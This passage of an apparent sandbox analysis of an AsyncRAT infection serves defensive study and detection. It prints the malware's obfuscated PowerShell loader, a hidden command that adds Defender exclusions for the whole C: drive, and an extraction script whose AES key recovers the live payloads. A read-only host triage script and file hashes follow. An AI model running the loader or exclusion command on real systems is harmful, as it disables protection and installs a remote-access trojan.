$zQ;$UwrDhZatxq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zQ).Split([Environment]::NewLine);foreach ($EN in 
$UwrDhZatxq) { if ($EN.StartsWith(':: ')) { $Z=$EN.Substring(3); break; }}$payloads_var=[string[]]$Z.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));8⤵
                     PID 2964; Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses
                     (this is the process whose memory matched family_asyncrat and that made the network request: the AsyncRAT client runs here, inside PowerShell)

Root-level processes with no recorded parent:

1⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   cmdline: powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
   PID 2756; Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
   (Defender exclusions for the whole C: drive and for every powershell.exe; the cmdlet name is split and invoked through .() so that "Add-MpPreference" never appears as one string in the command line)

1⤵ C:\Windows\system32\wbem\WmiApSrv.exe
   cmdline: C:\Windows\system32\wbem\WmiApSrv.exe
   PID 4092

1⤵ C:\Windows\system32\taskkill.exe
   cmdline: taskkill /IM cmstp.exe /F
   PID 4780; Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
   (cleans up the cmstp.exe instance started under PID 3468)
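Recovering the embedded payloads offline. The loader command lines recorded for PID 4028 and PID 2964 carry their AES key and IV in clear text, so the blobs each .bat hides in its ':: ' comment line can be decrypted without executing anything. The script below is an added example written for this page, not code from the sandbox or from the malware author: it repeats the loader's own steps (read the .bat, take the first ':: ' line, split on '\', Base64-decode, AES-256-CBC/PKCS7-decrypt with the recorded key and IV, GZip-inflate) but writes each result to disk instead of calling [Reflection.Assembly]::Load. The default input path, the output directory and the output file names are assumptions; the key, IV, separator and carrier-line rule are the ones in the recorded command line.

```powershell
<#
Added example for this page (not the sandbox's or the malware author's code).
Recovers the payloads that the recorded PowerShell loader hides in a .bat file,
using the loader's own steps but writing the results to disk instead of
loading them with [Reflection.Assembly]::Load.
Assumptions: the default -BatPath and -OutDir values and the output file names.
From the recorded command line: the ':: ' carrier line, the '\' separator, the
Base64 -> AES-CBC/PKCS7 -> GZip order, and the key/IV literals below.
#>
param(
    [string]$BatPath = "$env:TEMP\c.bat",   # assumed location of the dropped .bat
    [string]$OutDir  = ".\extracted"         # assumed output directory
)

$KeyB64 = 'ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis='   # 32 bytes -> AES-256
$IvB64  = 'ftBNGOmShOOXC7u6Pue69A=='                       # 16 bytes

function Unprotect-LoaderBlob {
    # One carrier blob: Base64 text -> AES-256-CBC (PKCS7) decrypt -> GZip inflate.
    param([Parameter(Mandatory)][string]$Base64)
    $cipher = [Convert]::FromBase64String($Base64)

    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyB64)
        $aes.IV      = [Convert]::FromBase64String($IvB64)
        $dec   = $aes.CreateDecryptor()
        $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
        $dec.Dispose()
    } finally { $aes.Dispose() }

    $in  = New-Object System.IO.MemoryStream -ArgumentList (,$plain)
    $gz  = New-Object System.IO.Compression.GZipStream -ArgumentList @($in, [System.IO.Compression.CompressionMode]::Decompress)
    $out = New-Object System.IO.MemoryStream
    try { $gz.CopyTo($out); $result = $out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
    return ,$result
}

# cmd.exe treats a line starting with '::' as a comment, so the carrier line is
# inert when the .bat runs; the loader reads the file and takes the first such line.
$carrier = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $carrier) { throw "No ':: ' carrier line found in $BatPath" }

$null   = New-Item -ItemType Directory -Force -Path $OutDir
$outAbs = (Resolve-Path -LiteralPath $OutDir).Path     # .NET file APIs need an absolute path
$blobs  = $carrier.Substring(3).Split('\')             # loader: $Z.Split('\')

for ($i = 0; $i -lt $blobs.Length; $i++) {
    $bytes   = Unprotect-LoaderBlob -Base64 $blobs[$i]
    $outFile = Join-Path $outAbs "payload$i.bin"
    [System.IO.File]::WriteAllBytes($outFile, $bytes)
    [pscustomobject]@{
        Index  = $i
        File   = $outFile
        Bytes  = $bytes.Length
        # The loader hands every blob to Assembly.Load, so a good result starts with 'MZ'.
        IsPE   = ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
        SHA256 = (Get-FileHash -LiteralPath $outFile -Algorithm SHA256).Hash
    }
}
```

Run it in an isolated analysis VM, e.g. `.\Extract-BatPayloads.ps1 -BatPath C:\cases\c.bat -OutDir C:\cases\out`: the output files are the live .NET payloads, and for the second stage at least one of them is the AsyncRAT client that matched family_asyncrat in PID 2964's memory. The second-stage file, %AppData%\inicia_str_615.bat, uses the identical key and IV (compare the PID 2964 command line), so the same invocation covers it. A Base64 or padding exception means the blob was not produced with this key/IV (a different build of the loader), not a parsing problem.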
Downloads (files written during the run; paths other than the first are not shown on the page)

File: C:\Users\Admin\AppData\Local\Server\AsyncRAT.exe_Url_bsozgjfh10ettuvlzzecwz2b2kv3ubbv\0.5.8.0\user.config
  Filesize  319B
  MD5       f71f55112253acc1ef2ecd0a61935970
  SHA1      faa9d50656e386e460278d31b1d9247fdd947bb7
  SHA256    d1ad588a08c8c0799d7a14509f1e0a7ae04c519102ed9d328a83fe65999e6179
  SHA512    761b5c13e39bd4ae21d298084bbe747ae71c383fedf9a51fd5e9723a8b3b4547de459d82bac7f3f8f3bfc11cfb0528a4f1057b51996d7d046583109a53317b44
  (.NET user-settings file written by the package's own AsyncRAT.exe panel, PID 4440; the 0.5.8.0 version folder matches the client version in the extracted config)

File: (path not shown)
  Filesize  3KB
  MD5       3eb3833f769dd890afc295b977eab4b4
  SHA1      e857649b037939602c72ad003e5d3698695f436f
  SHA256    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
  SHA512    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

File: (path not shown)
  Filesize  2KB
  MD5       99b15f35821046cf0dfc3dcb9189631f
  SHA1      5f178b323a1247ce94ebbadf9473c4dcd8ccb1ce
  SHA256    e4c2a17ef6811cc1458876f2ebf29b12aa8d0f381873c6d6748499944eb753e2
  SHA512    512975d45a2822515059c31aa1d64b36d7f78cc8ba8b5e0506b8b749a680581bbd01c03fbbf1a84bf078c021970835c298a865f237c76a2405d3e28577b73837

File: (path not shown)
  Filesize  1KB
  MD5       583774ec24a449d4d0f3db4323a4eba8
  SHA1      865464c173ffe8d09a687a985da3f244c6eb405e
  SHA256    c71907ff49f05df5272ee7afc60a6a23dd4a6ff3c25d0ca3acf13810d44060b2
  SHA512    3251a1d4ff051d9495fc16644ebfecbf6716c2b7ebb4c4ce7b835dfea49e24400c67275bedf1b464c187e3efeaea0b1b0758bb5ca914029e248cb7a6d3fba8ee

File: (path not shown)
  Filesize  17KB
  MD5       1a71ded3efcd783151b0bbfbfe7ef41a
  SHA1      aa222e09f605b9736cc8b12274d6d4e1940b4dd4
  SHA256    b9bba54a49497ecce51c0d5ce5bbbbde71496f6893251ac32d2c47ae1eb86757
  SHA512    78a7c92ed3be4f960e66f5e9bc7213ee1f44156e9ad6b808567e57f31d464a8c524fbaf7a5540ef8f0aee9977482264a6b8c9888cd4e5ae1ef1dbb0429644a7f

File: (path not shown)
  Filesize  484B
  MD5       e595d7391e0c93c76e9054a0f06b6d1b
  SHA1      2ad8157865988e926beecf8ca5eb3d2d4651b29c
  SHA256    58fab15eeb6896b61e895425a12a2ac5e4abf94b829f11016b708f4b1489d393
  SHA512    294fc12131aeaae11309aabf777fa156ab3d2609ff48998b0ab60240a7f15761da8d929f162d5c4a426fe92bca91eceadf2ec458193c21e85ea4f516e27cb8b3

File: (path not shown)
  Filesize  203KB
  MD5       02081ae0dbab5cbb3ba6fb3d316bb850
  SHA1      0b422b950e717427ec53709384b214433871f78b
  SHA256    f93f8db130adb1cb891c6a8591d1c2f518a4ba3d5aed98d1e7b530030b0297bb
  SHA512    7ae8c0859f25c7cecaa0be83d5ac99d20bde7287ef1f49ddd3114d4683c8ec05a2947f0c0d27b62ea5b4b0764d6ae0a104ffa7d6d84a46b1bd0ecb1eac9d718d

File: (path not shown)
  Filesize  6.4MB
  MD5       97a429c4b6a2cb95ece0ddb24c3c2152
  SHA1      6fcc26793dd474c0c7113b3360ff29240d9a9020
  SHA256    06899071233d61009a64c726a4523aa13d81c2517a0486cc99ac5931837008e5
  SHA512    524a63f39e472bd052a258a313ff4f2005041b31f11da4774d3d97f72773f3edb40df316fa9cc2a0f51ea5d8ac404cfdd486bab6718bae60f0d860e98e533f89

File: (path not shown)
  Filesize  1KB
  MD5       2ac2a82f5d664e9e408214e42ee95612
  SHA1      60c563cd33353a48c16243a1f4441760f97c99c6
  SHA256    1e3fb612bee89cf443ca48bcb602e24f10da8acc00d27adf3da472d58512b0b1
  SHA512    eaca532bcf3deb5489bbf7ae09da0a46c6cc83b336ab7bfb86855f093fa1b2e0fa84832a341e60ffc2f4e9d562b7e57b2ad2694e0754c20712efd8eec98f47de

File: (path not shown)
  Filesize  60B
  MD5       d17fe0a3f47be24a6453e9ef58c94641
  SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

File: (path not shown)
  Filesize  74KB
  MD5       88e72154cfed4a9932b4a4799aab6df7
  SHA1      043136d11ffa2f5aa6c8f6e961686a31a9eb50ef
  SHA256    3dc1f5d2c9260a882c6ebe35a4be8b407eced4ab579552b49d3e4d60ea68a373
  SHA512    f1479b3cab97a661360e9582a9cf5d49a28f8d92b63710e02345a3dfc19c151d8923990cf4c41936df9baae25a907e0c699133a8a0c4f09858d7a1021abf0bcf

File: (path not shown)
  Filesize  4KB
  MD5       77ee10b32885d6702146502d654c4e28
  SHA1      f046527e8cca8122b361a9ef6b2016f27256b2b6
  SHA256    f840b84b16215c3f032e12d30c928a9443119c2fb236b08a0eff7cf47f3a641e
  SHA512    8cb923b9ea801ad11b41b7e546b9bdd26618b61af670f79619dc7bd167826760d5c337368a9649502f4789e6f831b3a7b2b618fc23c5c003483ad55a41d04a7b

File: (path not shown)
  Filesize  114B
  MD5       a56cad6826bb7bbbff5fc13892c1d86b
  SHA1      093b45735e912d2bf8200032ad48dc9996764414
  SHA256    4aeda24432f4009f0e82a215cab4a39b763b4f3b6102e1fb63864cb5bb8894bc
  SHA512    bcae5d68c1a926fadfdbaa9cacddb68eb712fbcfd482446148142c544b7ef86def8a44b1b9875ccf7aa5cf391de2f10caa8be2603c556f17d9bfc3373a337518

File: (path not shown)
  Filesize  663B
  MD5       27581dbbe3c3840ce72f99c21071898a
  SHA1      898afeb9523df9367c74a01c0dbecf6b637f3cb1
  SHA256    c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b
  SHA512    0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

File: (path not shown)
  Filesize  652B
  MD5       6792d0ca48a3f5fd0b79718f4aa3a04a
  SHA1      0686a707d650b9e53b344e60e3545685888c143c
  SHA256    a31a403caa354b8e7380de2dfb5dceca8a8841b7dc07a85a3bbe1cd8bedb7437
  SHA512    d948e844a9c26d7ac4b5f610879e5d98609513739f2f535144f05b6135291fd96f81e3b1daad1a1d0e1a0fd9968b7f5571292df52c63dbc8d7dd58a5af96ec4f

File: (path not shown)
  Filesize  2KB
  MD5       b8106096972fb511e0cf8b99386ecf93
  SHA1      3003ba3a3681ba16d124d5b2305e6cc59af79b44
  SHA256    49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02
  SHA512    218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

File: (path not shown)
  Filesize  369B
  MD5       29680116eb5f04aa0e2b83433b720c39
  SHA1      ad307cacd58599cb366a7661f7d8f7d02d8ace6f
  SHA256    4968f6cef29383fbdd9f862c72b7fbdeaa9d57e015d2ca6d4d88d678b6c9a5a6
  SHA512    18a790707cffe995ee62f1ed8db249ae04a76247872a5765957bb1a8ea4dd2ade9c32c548f3c3b929ae5400c4ce7bdea3ac0b208f00683e9d0b9d270caeb99d0
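Checking a host for this chain. The artifacts this report records are concrete enough to hunt for directly: the logon task 'svchoststr615_str' pointing at a .vbs in %AppData%, the Defender exclusions for C:\ and powershell.exe, the dropped .vbs/.bat files in %AppData% and %TEMP%, and the mutex AbAUwI3PK3e3 from the extracted config, which the AsyncRAT client creates at start-up and keeps for its lifetime. The script below is an added example written for this page, not code from the sandbox or the malware: a read-only triage that reports those indicators and nothing else. The indicator values are the ones in the process tree and config; the profile-relative paths assume the same user layout the sandbox shows.

```powershell
<#
Added example for this page (not the sandbox's or the malware author's code):
read-only triage of a Windows host for the artifacts this report records.
Indicator values come from the process tree (task name, Defender exclusions,
dropped paths) and the extracted config (mutex). Profile-relative paths assume
the sandbox's user layout; adjust $Drops for other users.
#>
$Findings = New-Object 'System.Collections.Generic.List[string]'

# 1. Persistence. Recorded: Register-ScheduledTask -TaskName 'svchoststr615_str'
#    -AtLogon -Hidden -RunLevel Highest, running a .vbs from %AppData%.
#    Match the exact name and, more generally, any task whose action is a
#    script under a user profile (survives a renamed task).
foreach ($t in @(Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    foreach ($a in @($t.Actions)) {
        $exe = [string]$a.Execute
        $byName   = $t.TaskName -eq 'svchoststr615_str'
        $byAction = ($exe -match '(?i)\.(vbs|bat|cmd|js)$') -and ($exe -like "$env:SystemDrive\Users\*")
        if ($byName -or $byAction) {
            $Findings.Add("task '$($t.TaskName)' (RunLevel $($t.Principal.RunLevel), state $($t.State)) runs: $exe $($a.Arguments)")
        }
    }
}

# 2. Defense evasion. Recorded: Add-MpPreference -ExclusionPath C:\ -ExclusionProcess powershell.exe
#    A drive-root path exclusion or a powershell.exe process exclusion is abnormal on any host.
$mp = Get-MpPreference -ErrorAction SilentlyContinue
if ($mp) {
    foreach ($p in @($mp.ExclusionPath))    { if ($p -match '^[A-Za-z]:\\?$')  { $Findings.Add("Defender path exclusion covers a whole drive: $p") } }
    foreach ($p in @($mp.ExclusionProcess)) { if ($p -match '(?i)powershell') { $Findings.Add("Defender process exclusion: $p") } }
}

# 3. Dropped files named in the process tree (first and second stage).
$Drops = @("$env:APPDATA\inicia_str_615.vbs", "$env:APPDATA\inicia_str_615.bat",
           "$env:TEMP\c.bat", "$env:TEMP\AsyncRAT\7254_output.vbs")
foreach ($f in $Drops) {
    if (Test-Path -LiteralPath $f) {
        # A ':: ' line in the .bat is the payload carrier the loader reads; flag it if present.
        $carrier = ($f -like '*.bat') -and (Select-String -LiteralPath $f -Pattern '^:: ' -Quiet)
        $Findings.Add("dropped file present: $f" + $(if ($carrier) { ' (contains a ":: " payload carrier line)' }))
    }
}

# 4. Running client. AsyncRAT creates its configured mutex at start-up and holds it
#    for the life of the process. OpenExisting looks in the caller's session (Local\
#    namespace), so run this in the same session as the suspect process.
try {
    $m = [System.Threading.Mutex]::OpenExisting('AbAUwI3PK3e3')
    $m.Dispose()
    $Findings.Add("mutex 'AbAUwI3PK3e3' exists: an AsyncRAT client built with this config is running in this session")
}
catch [System.Threading.WaitHandleCannotBeOpenedException] { }
catch [System.UnauthorizedAccessException] {
    $Findings.Add("mutex 'AbAUwI3PK3e3' exists but could not be opened (holder runs at a different integrity level)")
}

if ($Findings.Count -eq 0) { 'no indicators from this report found' } else { $Findings }
```

The generic checks (any logon task running a script from a user profile, any whole-drive Defender exclusion) are the ones worth keeping after this particular sample is gone: the task name, file names and mutex are per-build values and will differ in the next campaign, while the technique does not.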